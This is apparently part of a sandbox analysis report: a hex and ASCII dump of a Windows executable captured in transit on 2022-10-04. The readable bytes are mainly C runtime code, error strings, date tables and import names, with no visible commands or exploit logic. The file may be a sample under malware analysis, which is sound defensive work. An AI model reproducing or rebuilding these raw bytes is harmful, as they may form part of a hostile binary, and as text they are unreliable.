                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16011INData Raw: 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 74 24 24 ff 76 10 ff 74 24 24 e8 31 10 00 00 83 c4 20 5e c3 55 8b ec 83 ec 38 53 81 7d 08 23 01 00 00 75 12 b8 4a 88 40 00 8b 4d 0c 89 01 33 c0 40 e9 b0 00 00 00 83 65 d8 00 c7 45 dc 76 88 40 00 a1 20 00 41 00 8d 4d d8 33 c1 89 45 e0 8b 45 18 89 45 e4 8b 45 0c 89 45 e8 8b 45 1c 89 45 ec 8b 45 20 89 45 f0 83 65 f4 00 83 65 f8 00 83 65 fc 00 89 65 f4 89 6d f8 64 a1 00 00 00 00 89 45 d8 8d 45 d8 64 a3 00 00 00 00 c7 45 c8 01 00 00 00 8b 45 08 89 45 cc 8b 45 10 89 45 d0 e8 9f b5 ff ff 8b 80 80 00 00 00 89 45 d4 8d 45 cc 50 8b 45 08 ff 30 ff 55 d4 59 59 83 65 c8 00 83 7d fc 00 74 17 64 8b 1d 00 00 00 00 8b 03 8b 5d d8 89 03 64 89 1d 00 00 00 00 eb 09 8b 45 d8 64 a3 00 00 00 00 8b 45 c8 5b c9 c3 55 8b ec 51 53 fc 8b 45 0c 8b
                                                                                                                                                                                                                                    Data Ascii: jVvvjt$$vt$$1 ^U8S}#uJ@M3@eEv@ AM3EEEEEEEE EeeeemdEEdEEEEEEEPE0UYYe}td]dEdE[UQSE
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16013INData Raw: ff ff 83 b8 90 00 00 00 00 7e 0c e8 e4 b0 ff ff 05 90 00 00 00 ff 08 33 c0 c3 6a 10 68 d8 f1 40 00 e8 4c a6 ff ff 8b 7d 10 8b 5d 08 81 7f 04 80 00 00 00 7f 06 0f be 73 08 eb 03 8b 73 08 89 75 e4 e8 ae b0 ff ff 05 90 00 00 00 ff 00 83 65 fc 00 3b 75 14 74 65 83 fe ff 7e 05 3b 77 04 7c 05 e8 b9 db ff ff 8b c6 c1 e0 03 8b 4f 08 03 c8 8b 31 89 75 e0 c7 45 fc 01 00 00 00 83 79 04 00 74 15 89 73 08 68 03 01 00 00 53 8b 4f 08 ff 74 01 04 e8 50 0b 00 00 83 65 fc 00 eb 1a ff 75 ec e8 32 ff ff ff 59 c3 8b 65 e8 83 65 fc 00 8b 7d 10 8b 5d 08 8b 75 e0 89 75 e4 eb 96 c7 45 fc fe ff ff ff e8 19 00 00 00 3b 75 14 74 05 e8 4d db ff ff 89 73 08 e8 de a5 ff ff c3 8b 5d 08 8b 75 e4 e8 0f b0 ff ff 83 b8 90 00 00 00 00 7e 0c e8 01 b0 ff ff 05 90 00 00 00 ff 08 c3 8b 00 81 38
                                                                                                                                                                                                                                    Data Ascii: ~3jh@L}]ssue;ute~;w|O1uEytshSOtPeu2Yee}]uuE;utMs]u~8
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16014INData Raw: f8 12 00 00 59 85 c0 74 0f f6 07 04 6a 00 58 0f 95 c0 40 89 45 e4 eb 05 e8 a8 d6 ff ff c7 45 fc fe ff ff ff 8b 45 e4 eb 0e 33 c0 40 c3 8b 65 e8 e9 44 d6 ff ff 33 c0 e8 22 a1 ff ff c3 6a 08 68 c0 f2 40 00 e8 d0 a0 ff ff 8b 45 10 f7 00 00 00 00 80 74 05 8b 5d 0c eb 0a 8b 48 08 8b 55 0c 8d 5c 11 0c 83 65 fc 00 8b 75 14 56 50 ff 75 0c 8b 7d 08 57 e8 46 fe ff ff 83 c4 10 48 74 1f 48 75 34 6a 01 8d 46 08 50 ff 77 18 e8 ac fb ff ff 59 59 50 ff 76 18 53 e8 14 f4 ff ff eb 18 8d 46 08 50 ff 77 18 e8 92 fb ff ff 59 59 50 ff 76 18 53 e8 fa f3 ff ff c7 45 fc fe ff ff ff e8 9d a0 ff ff c3 33 c0 40 c3 8b 65 e8 e9 ab d5 ff ff 55 8b ec 83 7d 18 00 74 10 ff 75 18 53 56 ff 75 08 e8 59 ff ff ff 83 c4 10 83 7d 20 00 ff 75 08 75 03 56 eb 03 ff 75 20 e8 bb f3 ff ff ff 37 ff 75
                                                                                                                                                                                                                                    Data Ascii: YtjX@EEE3@eD3"jh@Et]HU\euVPu}WFHtHu4jFPwYYPvSFPwYYPvSE3@eU}tuSVuY} uuVu 7u
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16015INData Raw: 75 14 ff 75 10 ff 75 0c 56 e8 d3 fb ff ff 83 c4 20 e8 2c a6 ff ff 83 b8 94 00 00 00 00 74 05 e8 48 d1 ff ff 5f 5e 5b c9 c3 56 ff 74 24 08 8b f1 e8 cf f3 ff ff c7 06 fc eb 40 00 8b c6 5e c2 04 00 55 8b ec 53 56 57 e8 f6 a5 ff ff 83 b8 0c 02 00 00 00 8b 45 18 8b 4d 08 bf 63 73 6d e0 be ff ff ff 1f bb 22 05 93 19 75 20 8b 11 3b d7 74 1a 81 fa 26 00 00 80 74 12 8b 10 23 d6 3b d3 72 0a f6 40 20 01 0f 85 93 00 00 00 f6 41 04 66 74 23 83 78 04 00 0f 84 83 00 00 00 83 7d 1c 00 75 7d 6a ff 50 ff 75 14 ff 75 0c e8 ba f4 ff ff 83 c4 10 eb 6a 83 78 0c 00 75 12 8b 10 23 d6 81 fa 21 05 93 19 72 58 83 78 1c 00 74 52 39 39 75 32 83 79 10 03 72 2c 39 59 14 76 27 8b 51 1c 8b 52 08 85 d2 74 1d 0f b6 75 24 56 ff 75 20 ff 75 1c 50 ff 75 14 ff 75 10 ff 75 0c 51 ff d2 83 c4 20
                                                                                                                                                                                                                                    Data Ascii: uuuV ,tH_^[Vt$@^USVWEMcsm"u ;t&t#;r@ Aft#x}u}jPuujxu#!rXxtR99u2yr,9Yv'QRtu$Vu uPuuuQ
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16017INData Raw: 51 ff 70 04 ff 30 e8 41 0b 00 00 33 db 83 c4 14 3b fb 75 18 e8 de 88 ff ff 53 53 53 53 53 89 30 e8 31 9d ff ff 83 c4 14 8b c6 eb 6f 8b 45 10 3b c3 76 e1 83 f8 ff 8b 75 14 75 05 83 c8 ff eb 14 33 c9 83 7d d4 2d 0f 94 c1 2b c1 33 c9 3b f3 0f 9f c1 2b c1 8d 4d d4 51 8d 4e 01 51 50 33 c0 83 7d d4 2d 0f 94 c0 33 c9 3b f3 0f 9f c1 03 c7 03 c8 51 e8 5d 09 00 00 83 c4 10 3b c3 74 04 88 1f eb 19 ff 75 1c 8d 45 d4 53 50 ff 75 18 8b c7 56 ff 75 10 e8 d7 fd ff ff 83 c4 18 8b 4d fc 5f 5e 33 cd 5b e8 65 82 ff ff c9 c3 55 8b ec 6a 00 ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 19 ff ff ff 83 c4 18 5d c3 55 8b ec 83 ec 24 56 57 ff 75 1c 8d 4d dc c7 45 ec ff 03 00 00 33 ff c7 45 fc 30 00 00 00 e8 25 c3 ff ff 39 7d 14 7d 03 89 7d 14 8b 75 0c 3b f7 75 2b e8 f8 87 ff ff
                                                                                                                                                                                                                                    Data Ascii: Qp0A3;uSSSSS01oE;vuu3}-+3;+MQNQP3}-3;Q];tuESPuVuM_^3[eUjuuuuu]U$VWuME3E0%9}}}u;u+
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16018INData Raw: ef 05 00 00 33 db 83 c4 14 3b fb 75 18 e8 8c 83 ff ff 53 53 53 53 53 89 30 e8 df 97 ff ff 83 c4 14 8b c6 eb 5a 8b 45 10 3b c3 76 e1 83 f8 ff 75 04 0b c0 eb 0b 33 c9 83 7d d4 2d 0f 94 c1 2b c1 8b 75 14 8d 4d d4 51 8b 4d d8 03 ce 51 50 33 c0 83 7d d4 2d 0f 94 c0 03 c7 50 e8 1c 04 00 00 83 c4 10 3b c3 74 04 88 1f eb 15 ff 75 18 8d 45 d4 53 56 ff 75 10 8b cf e8 64 fe ff ff 83 c4 10 8b 4d fc 5f 5e 33 cd 5b e8 28 7d ff ff c9 c3 55 8b ec 83 ec 30 a1 20 00 41 00 33 c5 89 45 fc 8b 45 08 53 56 8b 75 0c 57 6a 16 5f 57 8d 4d e4 51 8d 4d d0 51 ff 70 04 ff 30 e8 36 05 00 00 33 db 83 c4 14 3b f3 75 1b e8 d3 82 ff ff 53 53 53 53 53 89 38 e8 26 97 ff ff 83 c4 14 8b c7 e9 96 00 00 00 8b 4d 10 3b cb 76 de 8b 45 d4 48 89 45 e0 33 c0 83 7d d0 2d 0f 94 c0 83 f9 ff 8d 3c 30 75
                                                                                                                                                                                                                                    Data Ascii: 3;uSSSSS0ZE;vu3}-+uMQMQP3}-P;tuESVudM_^3[(}U0 A3EESVuWj_WMQMQp063;uSSSSS8&M;vEHE3}-<0u
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16019INData Raw: 0c 8b 42 04 8b 12 0f b7 d9 be 00 00 00 80 25 ff ff 0f 00 85 db 89 75 fc 74 13 3b df 74 08 81 c1 00 3c 00 00 eb 28 bf ff 7f 00 00 eb 24 33 db 3b c3 75 12 3b d3 75 0e 8b 45 08 66 8b 4d 0c 89 58 04 89 18 eb 4c 81 c1 01 3c 00 00 89 5d fc 0f b7 f9 8b ca c1 e9 15 c1 e0 0b 0b c8 0b 4d fc 8b 45 08 c1 e2 0b 85 ce 89 48 04 89 10 75 1f 8b 08 8b 50 04 8b d9 03 d2 c1 eb 1f 0b d3 03 c9 81 c7 ff ff 00 00 85 d6 89 50 04 89 08 74 e1 8b 4d 0c 0b cf 5f 5e 66 89 48 08 5b c9 c3 55 8b ec 83 ec 30 a1 20 00 41 00 33 c5 89 45 fc 8b 45 14 53 8b 5d 10 56 89 45 d0 57 8d 45 08 50 8d 45 f0 50 e8 1c ff ff ff 59 59 8d 45 d4 50 6a 00 6a 11 83 ec 0c 8d 75 f0 8b fc a5 a5 66 a5 e8 fc 12 00 00 8b 75 d0 89 43 08 0f be 45 d6 89 03 0f bf 45 d4 89 43 04 8d 45 d8 50 ff 75 18 56 e8 9d b0 ff ff 83
                                                                                                                                                                                                                                    Data Ascii: B%ut;t<($3;u;uEfMXL<]MEHuPPtM_^fH[U0 A3EES]VEWEPEPYYEPjjufuCEECEPuV
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16021INData Raw: eb 1f 85 c9 74 1e 8d 4c 85 e0 8b 11 8d 72 01 33 ff 3b f2 72 05 83 fe 01 73 03 33 ff 47 89 31 8b cf 48 79 de 8b 4d f0 83 c8 ff d3 e0 21 03 8b 45 f4 40 83 f8 03 7d 0d 6a 03 59 8d 7c 85 e0 2b c8 33 c0 f3 ab 8b 0d 6c 0d 41 00 41 8b c1 99 83 e2 1f 03 c2 8b d1 c1 f8 05 81 e2 1f 00 00 80 79 05 4a 83 ca e0 42 83 65 f4 00 83 65 08 00 83 cf ff 8b ca d3 e7 c7 45 fc 20 00 00 00 29 55 fc f7 d7 8b 5d 08 8d 5c 9d e0 8b 33 8b ce 23 cf 89 4d f0 8b ca d3 ee 8b 4d fc 0b 75 f4 89 33 8b 75 f0 d3 e6 ff 45 08 83 7d 08 03 89 75 f4 7c d3 8b f0 6a 02 c1 e6 02 8d 4d e8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 e0 eb 05 83 64 95 e0 00 4a 83 e9 04 85 d2 7d e7 6a 02 33 db 58 e9 5a 01 00 00 3b 1d 60 0d 41 00 8b 0d 6c 0d 41 00 0f 8c ad 00 00 00 33 c0 8d 7d e0 ab ab ab 81 4d e0 00 00 00 80 8b
                                                                                                                                                                                                                                    Data Ascii: tLr3;rs3G1HyM!E@}jY|+3lAAyJBeeE )U]\3#MMu3uE}u|jMZ+;|1tdJ}j3XZ;`AlA3}M
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16022INData Raw: 01 73 03 33 ff 47 89 31 8b cf 48 79 de 8b 4d f0 83 c8 ff d3 e0 21 03 8b 45 f4 40 83 f8 03 7d 0d 6a 03 59 8d 7c 85 e0 2b c8 33 c0 f3 ab 8b 0d 84 0d 41 00 41 8b c1 99 83 e2 1f 03 c2 8b d1 c1 f8 05 81 e2 1f 00 00 80 79 05 4a 83 ca e0 42 83 65 f4 00 83 65 08 00 83 cf ff 8b ca d3 e7 c7 45 fc 20 00 00 00 29 55 fc f7 d7 8b 5d 08 8d 5c 9d e0 8b 33 8b ce 23 cf 89 4d f0 8b ca d3 ee 8b 4d fc 0b 75 f4 89 33 8b 75 f0 d3 e6 ff 45 08 83 7d 08 03 89 75 f4 7c d3 8b f0 6a 02 c1 e6 02 8d 4d e8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 e0 eb 05 83 64 95 e0 00 4a 83 e9 04 85 d2 7d e7 6a 02 33 db 58 e9 5a 01 00 00 3b 1d 78 0d 41 00 8b 0d 84 0d 41 00 0f 8c ad 00 00 00 33 c0 8d 7d e0 ab ab ab 81 4d e0 00 00 00 80 8b c1 99 83 e2 1f 03 c2 8b d1 c1 f8 05 81 e2 1f 00 00 80 79 05 4a 83 ca
                                                                                                                                                                                                                                    Data Ascii: s3G1HyM!E@}jY|+3AAyJBeeE )U]\3#MMu3uE}u|jMZ+;|1tdJ}j3XZ;xAA3}MyJ
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16023INData Raw: 00 89 4d 9c eb 0b 3c 39 0f 8f 5b ff ff ff 8a 02 42 3a c3 7d f1 e9 4f ff ff ff ff 4d b4 ff 45 b0 4f 80 3f 00 74 f4 8d 45 c4 50 ff 75 b4 8d 45 e0 50 e8 92 10 00 00 8b 45 9c 33 c9 83 c4 0c 39 4d 98 7d 02 f7 d8 03 45 b0 39 4d a0 75 03 03 45 18 39 4d a4 75 03 2b 45 1c 3d 50 14 00 00 0f 8f ee 02 00 00 3d b0 eb ff ff 0f 8c fa 02 00 00 be 90 0d 41 00 83 ee 60 3b c1 89 45 ac 0f 84 b5 02 00 00 7d 0d f7 d8 be f0 0e 41 00 89 45 ac 83 ee 60 39 4d 14 75 04 66 89 4d c4 39 4d ac 0f 84 94 02 00 00 8b 45 ac c1 7d ac 03 83 c6 54 83 e0 07 85 c0 89 75 b4 0f 84 72 02 00 00 6b c0 0c 03 c6 8b d8 66 81 3b 00 80 89 5d 90 72 14 8b f3 8d 7d b8 a5 a5 a5 ff 4d ba 8b 75 b4 8d 5d b8 89 5d 90 0f b7 53 0a 8b 4d ce 33 c0 89 45 b0 89 45 d4 89 45 d8 89 45 dc 8b c2 bf ff 7f 00 00 33 c1 23 cf
                                                                                                                                                                                                                                    Data Ascii: M<9[B:}OMEO?tEPuEPE39M}E9MuE9Mu+E=P=A`;E}AE`9MufM9ME}Turkf;]r}Mu]]SM3EEEE3#
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16025INData Raw: 4d b4 33 c0 b9 90 0d 41 00 f7 db 83 e9 60 3b d8 66 89 55 ea 89 75 e6 89 7d e2 66 89 45 e0 89 4d 98 0f 84 ae 02 00 00 7d 0d b9 f0 0e 41 00 f7 db 83 e9 60 89 4d 98 3b d8 0f 84 97 02 00 00 83 45 98 54 8b cb 83 e1 07 c1 fb 03 85 c9 0f 84 79 02 00 00 6b c9 0c 03 4d 98 66 81 39 00 80 89 4d 9c 72 13 8b f1 8d 7d c4 a5 a5 8d 45 c4 a5 ff 4d c6 89 45 9c 8b c8 0f b7 79 0a 8b 55 ea 33 c0 8b cf be ff 7f 00 00 33 ca 23 d6 23 fe 89 45 b8 89 45 f0 89 45 f4 89 45 f8 81 e1 00 80 00 00 66 3b d6 8d 04 17 0f b7 c0 0f 83 03 02 00 00 66 3b fe 0f 83 fa 01 00 00 66 3d fd bf 0f 87 f0 01 00 00 66 3d bf 3f 77 10 33 c0 89 45 e8 89 45 e4 89 45 e0 e9 f6 01 00 00 33 f6 66 3b d6 75 1d 40 f7 45 e8 ff ff ff 7f 75 13 39 75 e4 75 0e 39 75 e0 75 09 66 89 75 ea e9 d2 01 00 00 66 3b fe 75 24 8b
                                                                                                                                                                                                                                    Data Ascii: M3A`;fUu}fEM}A`M;ETykMf9Mr}EMEyU33##EEEEf;f;f=f=?w3EEE3f;u@Eu9uu9uufuf;u$
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16026INData Raw: c6 42 03 01 0f 95 c0 fe c8 24 0d 04 20 88 42 02 c6 42 04 30 c6 42 05 00 e9 af f9 ff ff 6a 15 59 39 4d 14 7e 03 89 4d 14 8b 75 e8 c1 ee 10 6a 08 81 ee fe 3f 00 00 66 89 45 ea 5b 8b 45 e0 8b 7d e4 8b 4d e4 d1 65 e0 c1 e8 1f 03 ff 0b f8 8b 45 e8 c1 e9 1f 03 c0 0b c1 4b 89 7d e4 89 45 e8 75 da 85 f6 7d 32 f7 de 81 e6 ff 00 00 00 7e 28 8b 45 e8 8b 7d e4 8b 4d e4 d1 6d e8 c1 e0 1f d1 ef 0b f8 8b 45 e0 c1 e1 1f d1 e8 0b c1 4e 85 f6 89 7d e4 89 45 e0 7f d8 8b 45 14 40 85 c0 8d 5a 04 89 5d c0 89 45 b4 0f 8e b5 00 00 00 8b 55 e0 8b 45 e4 8d 75 e0 8d 7d c4 a5 a5 a5 d1 65 e0 8b 7d e0 d1 65 e0 c1 ea 1f 8d 0c 00 0b ca 8b 55 e8 8b f0 c1 ee 1f 03 d2 0b d6 8b c1 8d 34 09 c1 e8 1f 8d 0c 12 8b 55 c4 c1 ef 1f 0b c8 8b 45 e0 0b f7 8d 3c 02 3b f8 72 04 3b fa 73 18 8d 46 01 33
                                                                                                                                                                                                                                    Data Ascii: B$ BB0BjY9M~Muj?fE[E}MeEK}Eu}2~(E}MmEN}EE@Z]EUEu}e}eU4UE<;r;sF3
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16027INData Raw: 00 00 59 0f ae 5c 24 28 8b 44 24 28 33 d2 84 c0 79 03 6a 10 5a bf 00 02 00 00 85 c7 74 03 83 ca 08 66 a9 00 04 74 03 83 ca 04 66 a9 00 08 74 03 83 ca 02 66 a9 00 10 74 03 83 ca 01 be 00 01 00 00 85 c6 74 06 81 ca 00 00 08 00 8b c8 23 cd 74 22 81 f9 00 20 00 00 74 18 81 f9 00 40 00 00 74 0c 3b cd 75 0e 81 ca 00 03 00 00 eb 06 0b d7 eb 02 0b d6 23 c3 83 e8 40 74 1c 2d c0 7f 00 00 74 0d 83 e8 40 75 16 81 ca 00 00 00 01 eb 0e 81 ca 00 00 00 03 eb 06 81 ca 00 00 00 02 8b c2 8b 4c 24 1c 8b d0 33 d1 0b c1 f7 c2 1f 03 08 00 74 05 0d 00 00 00 80 5f 5e 5d 5b 83 c4 10 c3 55 8b ec 83 ec 18 a1 20 00 41 00 33 c5 89 45 fc 8b 45 10 53 56 33 f6 39 75 0c 57 c7 45 e8 4e 40 00 00 89 30 89 70 04 89 70 08 0f 86 46 01 00 00 8b 10 8b 58 04 8b f0 8d 7d f0 a5 a5 a5 8b ca c1 e9 1f
                                                                                                                                                                                                                                    Data Ascii: Y\$(D$(3yjZtftftftt#t" t@t;u#@t-t@uL$3t_^][U A3EESV39uWEN@0ppFX}
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16029INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16030INData Raw: 47 20 65 72 72 6f 72 0d 0a 00 00 00 00 44 4f 4d 41 49 4e 20 65 72 72 6f 72 0d 0a 00 00 00 00 00 00 52 36 30 33 34 0d 0a 41 6e 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 68 61 73 20 6d 61 64 65 20 61 6e 20 61 74 74 65 6d 70 74 20 74 6f 20 6c 6f 61 64 20 74 68 65 20 43 20 72 75 6e 74 69 6d 65 20 6c 69 62 72 61 72 79 20 69 6e 63 6f 72 72 65 63 74 6c 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 6c 69 63 61 74 69 6f 6e 27 73 20 73 75 70 70 6f 72 74 20 74 65 61 6d 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0d 0a 00 00 00 00 00 00 52 36 30 33 33 0d 0a 2d 20 41 74 74 65 6d 70 74 20 74 6f 20 75 73 65 20 4d 53 49 4c 20 63 6f 64 65 20 66 72 6f 6d 20 74 68 69 73 20 61 73 73 65 6d 62 6c 79 20 64 75 72 69 6e 67 20 6e 61
                                                                                                                                                                                                                                    Data Ascii: G errorDOMAIN errorR6034An application has made an attempt to load the C runtime library incorrectly.Please contact the application's support team for more information.R6033- Attempt to use MSIL code from this assembly during na
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16031INData Raw: 0a 0a 00 00 2e 2e 2e 00 3c 70 72 6f 67 72 61 6d 20 6e 61 6d 65 20 75 6e 6b 6e 6f 77 6e 3e 00 00 52 75 6e 74 69 6d 65 20 45 72 72 6f 72 21 0a 0a 50 72 6f 67 72 61 6d 3a 20 00 00 00 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 41 6e 64 53 70 69 6e 43 6f 75 6e 74 00 00 00 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 00 00 20 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 27 00 00 00 20 43 6c 61 73 73 20 48 69 65 72 61 72 63 68 79 20 44 65 73 63 72 69 70 74 6f 72 27 00 00 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 41 72 72 61 79 27 00 00 20 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 00 20 54 79 70 65 20 44 65 73 63 72 69 70 74 6f 72 27 00 00 00 60 6c 6f 63 61 6c 20 73 74 61 74
                                                                                                                                                                                                                                    Data Ascii: ...<program name unknown>Runtime Error!Program: InitializeCriticalSectionAndSpinCountkernel32.dll Complete Object Locator' Class Hierarchy Descriptor' Base Class Array' Base Class Descriptor at ( Type Descriptor'`local stat
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16035INData Raw: fd fe ff 48 48 3a 6d 6d 3a 73 73 00 00 00 00 64 64 64 64 2c 20 4d 4d 4d 4d 20 64 64 2c 20 79 79 79 79 00 4d 4d 2f 64 64 2f 79 79 00 00 00 00 50 4d 00 00 41 4d 00 00 44 65 63 65 6d 62 65 72 00 00 00 00 4e 6f 76 65 6d 62 65 72 00 00 00 00 4f 63 74 6f 62 65 72 00 53 65 70 74 65 6d 62 65 72 00 00 00 41 75 67 75 73 74 00 00 4a 75 6c 79 00 00 00 00 4a 75 6e 65 00 00 00 00 41 70 72 69 6c 00 00 00 4d 61 72 63 68 00 00 00 46 65 62 72 75 61 72 79 00 00 00 00 4a 61 6e 75 61 72 79 00 44 65 63 00 4e 6f 76 00 4f 63 74 00 53 65 70 00 41 75 67 00 4a 75 6c 00 4a 75 6e 00 4d 61 79 00 41 70 72 00 4d 61 72 00 46 65 62 00 4a 61 6e 00 53 61 74 75 72 64 61 79 00 00 00 00 46 72 69 64 61 79 00 00 54 68 75 72 73 64 61 79 00 00 00 00 57 65 64 6e 65 73 64 61 79 00 00 00 54 75 65 73
                                                                                                                                                                                                                                    Data Ascii: HH:mm:ssdddd, MMMM dd, yyyyMM/dd/yyPMAMDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruaryJanuaryDecNovOctSepAugJulJunMayAprMarFebJanSaturdayFridayThursdayWednesdayTues
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16040INData Raw: 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 00 f7 00 46 72 65 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 57 01 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 00 10 01 47 65 74 43 6f 6d 6d 61 6e 64 4c 69 6e 65 41 00 11 01 47 65 74 43 6f 6d 6d 61 6e 64 4c 69 6e 65 57 00 24 03 53 65 74 48 61 6e 64 6c 65 43 6f 75 6e 74 00 00 66 01 47 65 74 46 69 6c 65 54 79 70 65 00 b7 01 47 65 74 53 74 61 72 74 75 70 49 6e 66 6f 41 00 a3 02 51 75 65 72 79 50 65 72 66 6f 72 6d 61 6e 63 65 43 6f 75 6e 74 65 72 00 df 01 47 65 74 54 69 63 6b 43 6f 75 6e 74 00 00 43 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 49 64 00 ca 01 47 65 74 53 79 73 74 65 6d 54 69 6d 65 41 73 46 69 6c 65 54 69 6d 65 00 23 02 49 6e 69 74 69 61 6c 69 7a 65 43
                                                                                                                                                                                                                                    Data Ascii: onmentStringsFreeEnvironmentStringsWWGetEnvironmentStringsWGetCommandLineAGetCommandLineW$SetHandleCountfGetFileTypeGetStartupInfoAQueryPerformanceCounterGetTickCountCGetCurrentProcessIdGetSystemTimeAsFileTime#InitializeC
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16041INData Raw: 33 33 32 62 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: 332b
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16045INData Raw: 6e 40 73 74 64 40 40 00 00 00 00 00 00 04 00 00 01 fc ff ff 35 00 00 00 0b 00 00 00 40 00 00 00 ff 03 00 00 80 00 00 00 81 ff ff ff 18 00 00 00 08 00 00 00 20 00 00 00 7f 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 40 00 00 00 00 00 00 00 00 00 c8 05 40 00 00 00 00 00 00 00 00 00 fa 08 40 00 00 00 00 00 00 00 00 40 9c 0c 40 00 00 00 00 00 00 00 00 50 c3 0f 40 00 00 00 00 00 00 00 00 24 f4 12 40 00 00 00 00 00 00 00 80 96 98 16 40 00 00 00 00 00 00 00 20 bc be 19 40 00 00 00 00 00 04 bf c9 1b 8e 34 40 00 00 00 a1 ed cc ce 1b c2 d3 4e 40 20 f0 9e b5 70 2b a8 ad c5 9d 69 40 d0 5d fd 25 e5 1a 8e 4f 19 eb 83 40 71 96 d7 95 43 0e 05 8d 29 af 9e 40 f9 bf a0 44 ed 81 12 8f 81 82 b9 40 bf 3c d5 a6 cf ff 49 1f 78 c2 d3 40 6f c6 e0 8c e9 80 c9 47 ba 93 a8 41 bc 85 6b
                                                                                                                                                                                                                                    Data Ascii: n@std@@5@ @@@@@P@$@@ @4@N@ p+i@]%O@qC)@D@<Ix@oGAk
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC16049INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii:
